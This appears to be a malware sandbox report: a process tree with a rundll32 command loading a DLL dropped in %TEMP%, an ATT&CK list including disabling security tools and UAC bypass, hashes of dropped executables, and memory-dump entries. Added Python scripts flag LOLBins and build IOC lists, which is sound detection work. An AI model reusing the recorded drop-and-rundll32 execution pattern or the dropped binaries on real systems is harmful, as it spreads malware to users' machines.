  C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 6272 -ip 6272
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Program Files\Windows Defender\mpcmdrun.exe
  "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7148 -ip 7148
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  - Modifies data under HKEY_USERS
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5624 -ip 5624
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5888 -ip 5888
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2904 -ip 2904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
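The process tree above is the part of the report an analyst reads first, and two questions come up immediately: which living-off-the-land binaries were used to run dropped code (here rundll32.exe loading sqlite.dll from %TEMP%), and how many of the payloads crashed (every WerFault.exe launch names the faulting process with -p <pid>). The script below is an added example, not part of the sandbox report or its tooling. It parses the report's raw text export, in which the image path is glued to the command line and each process line ends with its tree depth and a "⤵" marker, rebuilds parent/child links from the depth, and runs both checks. The sample lines are a constructed excerpt in that layout; the LOLBin list and the set of user-writable directories are the author's own choices, not something the report defines.

```python
"""Parse a sandbox report's text-exported process tree and pull out the two
things an analyst checks first: LOLBins loading code from user-writable
paths, and which PIDs crashed (each WerFault.exe launch names the faulting
process with -p <pid>).

Added example, not part of the original report. The export layout it parses:
image path glued to the command line, the tree depth and a '⤵' marker at the
end of the line, then "- <indicator>" lines; a lone "-" separates entries.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in the raw export layout (a short excerpt, not the full tree).
SAMPLE = r"""
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5924 -ip 59241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4788 -ip 47881⤵
-
"""

# <image>.exe followed by the command line, which restarts with either the full
# image path or just its basename (optionally quoted), then a one-digit depth.
PROC_RE = re.compile(
    r'^(?P<image>.+?\\(?P<base>[^\\]+?\.exe))'
    r'(?P<cmdline>"?(?:(?P=image)|(?P=base)).*?)'
    r'(?P<depth>\d)⤵$'
)
# "-pss" must not be mistaken for "-p": require whitespace after -p.
WERFAULT_PID = re.compile(r"WerFault\.exe.*?\s-p\s+(\d+)", re.IGNORECASE)
# Author's choices (assumptions), not values taken from the report.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


@dataclass
class Proc:
    image: str
    cmdline: str
    depth: int
    parent: Optional["Proc"] = None
    indicators: List[str] = field(default_factory=list)

    @property
    def basename(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_tree(text: str) -> List[Proc]:
    """Rebuild the tree: a depth-N line is a child of the latest depth-(N-1) line."""
    procs, stack = [], []  # stack[i] is the most recent process at depth i+1
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PROC_RE.match(line)
        if m:
            depth = int(m.group("depth"))
            del stack[depth - 1:]  # discard same-level and deeper predecessors
            proc = Proc(m.group("image"), m.group("cmdline"), depth,
                        stack[-1] if stack else None)
            procs.append(proc)
            stack.append(proc)
        elif line.startswith("- ") and procs:
            procs[-1].indicators.append(line[2:])
        # a lone "-" is only the list separator in the export; skip it
    return procs


def lolbin_from_user_path(procs: List[Proc]) -> List[Proc]:
    """LOLBin whose command line points into a user-writable directory:
    the 'drop a DLL to %TEMP% and rundll32 it' pattern."""
    return [p for p in procs
            if p.basename in LOLBINS
            and any(d in p.cmdline.lower() for d in USER_WRITABLE)]


def crashed_pids(procs: List[Proc]) -> List[int]:
    """PIDs named by WerFault.exe -p <pid>, one per crashed process."""
    pids = []
    for p in procs:
        m = WERFAULT_PID.search(p.cmdline)
        if m:
            pids.append(int(m.group(1)))
    return pids


def lineage(p: Optional[Proc]) -> str:
    """'child <- parent <- ...' by basename, for one-line alert context."""
    chain = []
    while p is not None:
        chain.append(p.basename)
        p = p.parent
    return " <- ".join(chain)


if __name__ == "__main__":
    procs = parse_tree(SAMPLE)
    for p in lolbin_from_user_path(procs):
        print(f"[lolbin] {lineage(p)}: {p.cmdline}  indicators={p.indicators}")
    print("[crashed pids]", crashed_pids(procs))
```

Run against the full tree, crashed_pids gives the list of payload PIDs that died under WerFault, which is a quick way to see how many of the bundled droppers never reached their second stage; lolbin_from_user_path is the rule worth carrying into an EDR query, since the 64-bit rundll32.exe spawning a SysWOW64 rundll32.exe for a DLL under AppData\Local\Temp is exactly the shape seen here.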
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (2)
- Registry Run Keys / Startup Folder (2)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (9)
- Disabling Security Tools (5)
- Bypass User Account Control (1)
- Virtualization/Sandbox Evasion (1)
- Impair Defenses (1)
Downloads
-
C:\ProgramData\4877252.exe
MD5 373c6f1b7600a9cb46f1673c9e861206
SHA1 a11035bfb2346667edffdb3de7d1b4f2857b8f06
SHA256 3c55dcbfd6ea0a8f4d1a2a12e067518401adbd497902d3771cc40816589762ef
SHA512 406b6bbf1c97ef2c8a64341f8cd2d4e86ff34a404f8df58d828ae0d0b1fac60f2d1b4ba33db71bdc538da1c432aa580d422b88e41301ec89f35c9a725d98366c
-
C:\ProgramData\7604105.exe
MD5 0bc1bccb1afd14582a01ea108b78dc2e
SHA1 a6c1673f1e53d0717bad4725a0a5aaa1c115972a
SHA256 756db848aa7d071ee74c09247cefaa838c6086562efe3562001216578a372811
SHA512 dbcf2bbb8e7ba56558d3fd4780b0d76057686135e07e0e0b273a69453beac24d2177b397dfd0416e84a4bf88d57b85303f469ea7ec6b25ad3319057a03d52064
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5 a0ca34aaab23d38928b538aeeac5fc38
SHA1 a0ccc66c5b71a82e7ff623cd2bf003c698641721
SHA256 6b0b182fcb00e3848ce76ab7981f25a0e35ff4ad6bb2b05237e8a5b9c6f5b0cc
SHA512 7b4c3c6b4f79bd007efd8f60442dd0cd1ef6729c790850f250437d14a1a8a9a132db2d640c5c1bcd84703967102ed0395cc52c74a1edaaa6ebffc1463ce0abf6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5 6463516bffd17ebd7b28f4ae792184b7
SHA1 9de96e56f62f076c981b54b62200c4d38b82b486
SHA256 26118bf2574eabfe1f3a133f8c06e0644e1513f7fa911cdb02db946b4c70c16b
SHA512 6952f99c72bdc786eaef93d1328d988ffad788abaedbda359686cf2865e0b8425e33a351bc5a57ed1504a1288c544585d33d20108bad3093a1bb3b7df32aa147
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat01d42d6cf82db.exe.log
MD5 e07da89fc7e325db9d25e845e27027a8
SHA1 4b6a03bcdb46f325984cbbb6302ff79f33637e19
SHA256 94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf
SHA512 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat0119f3e03c741b02f.exe
MD5 39144d45b2d358cecb01f10c6c2137b6
SHA1 7b9e9bdd76a7784e6cb6a413bb9e67f577610536
SHA256 71e7ab1590dd88309d03363fb9da83deae9f0f36306df64b4239d182131d9736
SHA512 e5c50ee84fcf17925cf8ad59869c7732f7215007313f6ee3d71f2a42e9b5f0fd680b242c7457b21a7cd612295e6b55da76cbcc4876902cd7fd93fef31d729b3b
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe
MD5 831bbabfcd2487c10c13fbdd6ab35641
SHA1 ec05c8dd0ffb1aae26557a47a0ab552f966fcadf
SHA256 e245603d93bc6a65e4ffe1a4ce8f9c0a9d500fa2fc0ceea85de8216a0b4b140d
SHA512 b663cf3cdcb2d15c99f2a51888ab9e58d47da84d3bcd123ff3ceef63dc041574f7210008424a3add751c86cf506c666ac744f47966c82a62baee97e4def07b49
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01688f54435b6.exe
MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat016e74da9cbf1.exe
MD5 6843ec0e740bdad4d0ba1dbe6e3a1610
SHA1 9666f20f23ecd7b0f90e057c602cc4413a52d5a3
SHA256 4bb1e9ad4974b57a1364463ca28935d024a217791069dd88bedccca5eaad271a
SHA512 112a327b9e5f2c049177b2f237f5672e12b438e6d620411c7c50d945a8a3d96ec293d85a50392f62651cdf04a9f68d13d542b1626fb81b768eb342077409d6d3
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01866e4ba0024d.exe
MD5 dcf289d0f7a31fc3e6913d6713e2adc0
SHA1 44be915c2c70a387453224af85f20b1e129ed0f0
SHA256 06edeee5eaf02a2ee9849ca2b8bc9ec67c39c338c9b184c04f5f0da7c6bedfa5
SHA512 7035e016476ce5bd670dc23cf83115bb82b65e58e858e07c843a3e77584a3c0119aaa688f73761ac3388b648ab9dbf88378aa0a6fe82e269b8e9bd347c37ebca
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat0188dba58af938.exe
MD5 24766cc32519b05db878cf9108faeec4
SHA1 c553780cb609ec91212bcdd25d25dde9c8ef5016
SHA256 d7cdfb895940efd584c78b7e56f9ed720491234df489ee9eb9aa98c24714d530
SHA512 5b911d6bbb119b04f24ff21bd720d9a7d6f02d49a4cd0f533f0dc0d48b107244f5a8f028982b566d2b999420b30d047908df0c20e29acdc57b63df20c785bec3
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe
MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01b537da2e0af175a.exe
MD5 a9b1f1220f1d5b0fe97d1e88a0bad407
SHA1 d290340d1766ac2d112973bc3928a8d7531fe1d7
SHA256 9cde8e9e06dd9ce7b6e4a13e9772d6811a54b3aef023303ffcae41a85fdb33a1
SHA512 c79f13d666169ce82194bcf7aae6c5ca4d4a6444692d98642062d9eb01f2a604409ec629747dd5741cfb61236eb2fc6bb7a4e358f130db9488b2ae54c2330997
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01c0e0d4fbb2ea73.exe
MD5 b616a167f1e0cbbf6368e8bf8ece7a32
SHA1 8849a25dcc1b4da51f59599c01b4568d7fb6622b
SHA256 5d98034073257752da1041e4dfe8e5db75713027b5e2495a51ef59842ad7fdc9
SHA512 1d5816146d7cff65e6169c1101da4257a860f321ef83ca815c910fc9547cafa8d0886abcfd244d4bc4e83f161d9d5806bdbf184cc76606abc5851d90b7aeaf8f
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01c5002407.exe
MD5 d60a08a6456074f895e9f8338ea19515
SHA1 9547c405520a033bd479a0d20c056a1fdacf18af
SHA256 d12662f643b6daf1cfca3b45633eb2bf92c7928dbd0670718e5d57d24fb851e0
SHA512 b6cbd259e84826ccd2c99c7a66d90f1c2201d625eea6adcd37205e8adf4383ae44306ae1df682fb81b7e38c18bce017a69fba5141702263e4d480b4a30106c8e
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01d42d6cf82db.exe
MD5 5926205df9aec95421688c034191d5d3
SHA1 6b81f52f132c84bd81e8a932760c15766db104eb
SHA256 f71062ef3a53ec22a3d87cd2d85cecf96b57d7f4f1ef7bbe5e63f7927443f94a
SHA512 da704935b6a621b028eac2c860b7b9fa911d92fe6f51227c5c8e90a85dbbbeccfc6d1c49eef1cc171d5c1cda04d2466226d731ef3213e7a8f780dbe361f20921
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01e3b3e0fa80800c.exe
MD5 4fbc1db2471d00cab88f28ff4cbdb2b3
SHA1 2ce52d3428ed1338a1069cbde35c5826c881505d
SHA256 fd77728e7c4f52b63fb783a857bc93225ad1a01bab1a2c2fcfe30600ae306179
SHA512 5c491732849d237b79fcd9b47880ac81a28aa27f88096d9bda6727caae6d3131ee3c9bd2a4b16c22c3ff11699d55f3ae0d692f986dc30f4cff65660975760a09
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01f932a994dbc6.exe
MD5 03137e005bdf813088f651d5b2b53e5d
SHA1 0aa1fb7e5fc80bed261c805e15ee4e3709564258
SHA256 258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd
SHA512 23bbb89fe88264538461c0eae1437344e9823e245d00f0527424b95d4ca54054c8b411db3c066664617e0df69d1468ff10385841a5f1869a0e480a92abffdddd
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurl.dll
MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurlpp.dll
MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libgcc_s_dw2-1.dll
MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libstdc++-6.dll
MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libwinpthread-1.dll
MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\setup_install.exe
MD5 68757c6344361bcf1e0c4c28e04371e3
SHA1 f684f30fea1564eb768da7969c97bffc35d92cc5
SHA256 643113dfb28adf48b18e752d6e82eb5255e6fb4c8a8c69cb979bda0d898abf66
SHA512 862a6cfcc1122877d5d82d162b62a4210bc5c5183bc03c29f21f53f4b4ee5796cf1ffd0fd399d327d9b12266203fff05bec30e265d123a5862618fbd56e689b3
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
MD5 949d0032b9a37cd39ab6f96fb63a0a5b
SHA1 fd8852eb7e712014da9a5aa7d82aee54b4f66eef
SHA256 d77bcba4ec55acaf422f76fd704c8be8da0939188f3a4ae9fe1dfaf6f87b50c7
SHA512 f5178542979768529555f4e2fa237075e7e989fe182a4022c0c503af86d374a3a38690cde793188415ecf62892f3c8e4fd05203cdc353e402d2a65be47b5fc80
-
C:\Users\Admin\AppData\Local\Temp\is-6BUFL.tmp\idp.dll
MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc
-
C:\Users\Admin\AppData\Local\Temp\is-9IL7H.tmp\Sat018ad0a25a7faa.tmp
MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f
-
C:\Users\Admin\AppData\Local\Temp\is-OCS3I.tmp\idp.dll
MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc
-
C:\Users\Admin\AppData\Local\Temp\is-QKESC.tmp\Sat018ad0a25a7faa.tmp
MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f
-
C:\Users\Admin\AppData\Local\Temp\pidHTSIGEi8DrAmaYu9K8ghN89.dll
MD5 f07ac9ecb112c1dd62ac600b76426bd3
SHA1 8ee61d9296b28f20ad8e2dca8332ee60735f3398
SHA256 28859fa0e72a262e2479b3023e17ee46e914001d7f97c0673280a1473b07a8c0
SHA512 777139fd57082b928438b42f070b3d5e22c341657c5450158809f5a1e3db4abded2b566d0333457a6df012a4bbe3296b31f1caa05ff6f8bd48bfd705b0d30524
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
MD5 401358d510a50b4e174c1f3abaf3bc0e
SHA1 e3be8ffcc9dc2924652920f904f9058dbbf6e14e
SHA256 7e890b0ee04f14d8989db2a0a853c06741112c432030b63457fe866600b44749
SHA512 0e47c8e4ea84851263e7189374e299ac22c42a8986e1620661fff461d569f4b9d00ec56a462fb04eb99408c684b306d00bd16c4f1a43a09af18d74bb88244520
-
C:\Users\Admin\Pictures\Adobe Films\e5H4avJGAknZvvCppg0GFVNM.exe
MD5 3f22bd82ee1b38f439e6354c60126d6d
SHA1 63b57d818f86ea64ebc8566faeb0c977839defde
SHA256 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512 b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
-
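Turning the dropped-file list into indicators needs a little normalisation first: the report's raw text export glues each hash label to its value ("SHA1a11035...", and the leading "MD5" onto the end of the path), lists the same file once per observation, and writes the same DLL under several temp directories (idp.dll under two is-*.tmp folders, Sat018ad0a25a7faa.tmp under two more). The script below is an added example, not part of the report or its tooling: it parses that raw layout, sanity-checks hash lengths, collapses entries to one record per SHA256 with every path it was written to, and emits CSV-style lines ready for a blocklist or hunt query. The sample is a constructed excerpt in the export's layout; its hashes are copied from the report's own list.

```python
"""Normalise a sandbox report's dropped-file list into one record per unique
file. The report's raw text export glues each hash label to its value
("SHA1a11035...", and the first label "MD5" onto the end of the path) and
lists a file again for every observation, so the same binary shows up two
or three times and the same DLL can appear under several temp directories.

Added example, not part of the original report. The entries below are a
constructed excerpt in that raw layout; the hashes are the report's own.
"""
import re

# Constructed sample in the raw export layout: "<path>MD5", then the MD5 value
# on its own line, then label-glued SHA1/SHA256/SHA512 lines, "-" between entries.
SAMPLE = r"""
C:\ProgramData\7604105.exeMD5
0bc1bccb1afd14582a01ea108b78dc2e
SHA1a6c1673f1e53d0717bad4725a0a5aaa1c115972a
SHA256756db848aa7d071ee74c09247cefaa838c6086562efe3562001216578a372811
SHA512dbcf2bbb8e7ba56558d3fd4780b0d76057686135e07e0e0b273a69453beac24d2177b397dfd0416e84a4bf88d57b85303f469ea7ec6b25ad3319057a03d52064
-
C:\ProgramData\7604105.exeMD5
0bc1bccb1afd14582a01ea108b78dc2e
SHA1a6c1673f1e53d0717bad4725a0a5aaa1c115972a
SHA256756db848aa7d071ee74c09247cefaa838c6086562efe3562001216578a372811
SHA512dbcf2bbb8e7ba56558d3fd4780b0d76057686135e07e0e0b273a69453beac24d2177b397dfd0416e84a4bf88d57b85303f469ea7ec6b25ad3319057a03d52064
-
C:\Users\Admin\AppData\Local\Temp\is-6BUFL.tmp\idp.dllMD5
b37377d34c8262a90ff95a9a92b65ed8
SHA1faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA51269d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc
-
C:\Users\Admin\AppData\Local\Temp\is-OCS3I.tmp\idp.dllMD5
b37377d34c8262a90ff95a9a92b65ed8
SHA1faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA51269d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Longest label first so "SHA1" cannot swallow the start of a SHA256/SHA512 line.
LABELLED = re.compile(r"^(SHA512|SHA256|SHA1|MD5)([0-9a-fA-F]+)$")


def parse_dropped_files(text):
    """Return one dict per entry: {'path': ..., 'MD5': ..., 'SHA1': ..., ...}."""
    entries, cur, expect_md5 = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "-":  # separator between entries
            if cur:
                entries.append(cur)
            cur, expect_md5 = None, False
        elif line.endswith("MD5") and "\\" in line:
            cur = {"path": line[:-len("MD5")]}  # label was glued to the path
            expect_md5 = True
        elif cur is not None and expect_md5:
            cur["MD5"] = line.lower()  # MD5 value sits alone on the next line
            expect_md5 = False
        elif cur is not None:
            m = LABELLED.match(line)
            if m:
                cur[m.group(1)] = m.group(2).lower()
    if cur:
        entries.append(cur)
    return entries


def hash_problems(entry):
    """Algorithms whose value length is wrong: a truncated or mislabelled hash."""
    return [algo for algo, n in HASH_LEN.items() if len(entry.get(algo, "")) != n]


def dedupe_by_sha256(entries):
    """One record per SHA256: every path it was written to, and how often listed."""
    by_hash = {}
    for e in entries:
        rec = by_hash.setdefault(
            e["SHA256"], {"sha256": e["SHA256"], "md5": e["MD5"], "paths": [], "listed": 0})
        rec["listed"] += 1
        if e["path"] not in rec["paths"]:
            rec["paths"].append(e["path"])
    return list(by_hash.values())


def ioc_lines(records):
    """sha256,md5,<distinct path count>,<paths joined by ';'> per unique file."""
    return [f"{r['sha256']},{r['md5']},{len(r['paths'])},{';'.join(r['paths'])}"
            for r in records]


if __name__ == "__main__":
    entries = parse_dropped_files(SAMPLE)
    for e in entries:
        if hash_problems(e):
            print("bad hash lengths:", e["path"], hash_problems(e))
    for line in ioc_lines(dedupe_by_sha256(entries)):
        print(line)
```

Keying on SHA256 rather than on path is what makes the Inno Setup helper (idp.dll) show up once with two locations instead of as two unrelated files, and the "listed" count separates "written twice" from "written once, reported twice".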
memory/444-177-0x0000000000000000-mapping.dmp
-
memory/768-247-0x0000000000000000-mapping.dmp
-
memory/936-276-0x00000000020A0000-0x00000000020A1000-memory.dmp (4KB)
-
memory/936-255-0x0000000000000000-mapping.dmp
-
memory/1348-387-0x0000000000000000-mapping.dmp
-
memory/1400-222-0x0000000000000000-mapping.dmp
-
memory/1432-326-0x0000000005260000-0x0000000005261000-memory.dmp (4KB)
-
memory/1432-320-0x0000000005710000-0x0000000005711000-memory.dmp (4KB)
-
memory/1432-304-0x0000000000400000-0x0000000000420000-memory.dmp (128KB)
-
memory/1432-325-0x0000000005130000-0x0000000005131000-memory.dmp (4KB)
-
memory/1432-336-0x0000000005190000-0x0000000005191000-memory.dmp (4KB)
-
memory/1432-331-0x0000000005370000-0x0000000005371000-memory.dmp (4KB)
-
memory/1432-338-0x00000000050F0000-0x0000000005708000-memory.dmp (6.1MB)
-
memory/1432-303-0x0000000000000000-mapping.dmp
-
memory/1436-170-0x000000006FE40000-0x000000006FFC6000-memory.dmp (1.5MB)
-
memory/1436-178-0x0000000064940000-0x0000000064959000-memory.dmp (100KB)
-
memory/1436-172-0x000000006FE40000-0x000000006FFC6000-memory.dmp (1.5MB)
-
memory/1436-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp (1.5MB)
-
memory/1436-179-0x0000000064940000-0x0000000064959000-memory.dmp (100KB)
-
memory/1436-176-0x0000000064940000-0x0000000064959000-memory.dmp (100KB)
-
memory/1436-168-0x000000006B440000-0x000000006B4CF000-memory.dmp (572KB)
-
memory/1436-169-0x000000006FE40000-0x000000006FFC6000-memory.dmp (1.5MB)
-
memory/1436-167-0x000000006B440000-0x000000006B4CF000-memory.dmp (572KB)
-
memory/1436-166-0x000000006B440000-0x000000006B4CF000-memory.dmp (572KB)
-
memory/1436-174-0x0000000064940000-0x0000000064959000-memory.dmp (100KB)
-
memory/1436-173-0x000000006B280000-0x000000006B2A6000-memory.dmp (152KB)
-
memory/1436-151-0x0000000000000000-mapping.dmp
-
memory/1968-212-0x0000000000000000-mapping.dmp
-
memory/2148-175-0x0000000000000000-mapping.dmp
-
memory/2200-286-0x0000000000400000-0x0000000000414000-memory.dmp (80KB)
-
memory/2200-278-0x0000000000000000-mapping.dmp
-
memory/2236-506-0x0000000005870000-0x0000000005871000-memory.dmp (4KB)
-
memory/2264-292-0x00000000083D0000-0x00000000083D1000-memory.dmp (4KB)
-
memory/2264-181-0x0000000000000000-mapping.dmp
-
memory/2264-194-0x0000000002FB0000-0x0000000002FB1000-memory.dmp (4KB)
-
memory/2264-271-0x0000000007F50000-0x0000000007F51000-memory.dmp (4KB)
-
memory/2264-275-0x0000000007FC0000-0x0000000007FC1000-memory.dmp (4KB)
-
memory/2264-230-0x0000000003000000-0x0000000003001000-memory.dmp (4KB)
-
